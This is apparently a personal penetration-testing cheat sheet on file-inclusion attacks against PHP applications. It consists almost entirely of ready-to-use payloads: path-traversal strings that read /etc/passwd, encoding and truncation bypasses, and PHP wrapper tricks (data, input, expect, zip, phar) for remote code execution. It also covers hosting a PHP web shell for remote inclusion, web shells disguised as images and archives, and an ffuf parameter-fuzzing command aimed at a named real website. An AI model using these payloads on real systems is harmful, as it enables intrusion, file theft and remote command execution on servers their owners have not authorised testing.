Notes
Fuzz for parameters:
ffuf -w /home/francis/HTB/SecLists-master/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'https://blog.coinhako.com/ghost/api/content?FUZZ=value'
Basic LFI:
/index.php?language=/etc/passwd
Basic LFI
/index.php?language=../../../../etc/passwd
LFI with path traversal
/index.php?language=/../../../etc/passwd
LFI with name prefix
/index.php?language=./languages/../../../../etc/passwd
LFI with approved path
LFI Bypasses
/index.php?language=....//....//....//....//etc/passwd
Bypass basic path traversal filter
/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
Bypass filters with URL encoding
/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]
Bypass appended extension with path truncation (obsolete)
/index.php?language=../../../../etc/passwd%00
/index.php?language=php://filter/read=convert.base64-encode/resource=config
Read PHP with base64 filter
RCE:
PHP Wrappers
/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
RCE with data wrapper
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id"
RCE with input wrapper
curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"
RCE with expect wrapper
RFI
echo '<?php system($_GET["cmd"]); ?>' > shell.php && python3 -m http.server <LISTENING_PORT>
Host web shell
/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id include php remote web shell.
LFI + Upload
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
Create malicious image
/index.php?language=./profile_images/shell.gif&cmd=id
RCE with malicious uploaded image
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php - create malicious zip archive as 'jpg'
/index.php?language=zip://shell.zip%23shell.php&cmd=id
RCE with malicious uploaded zip
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
Create malicious phar 'as jpg'
/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id RCE with malicious uploaded phar
Last updated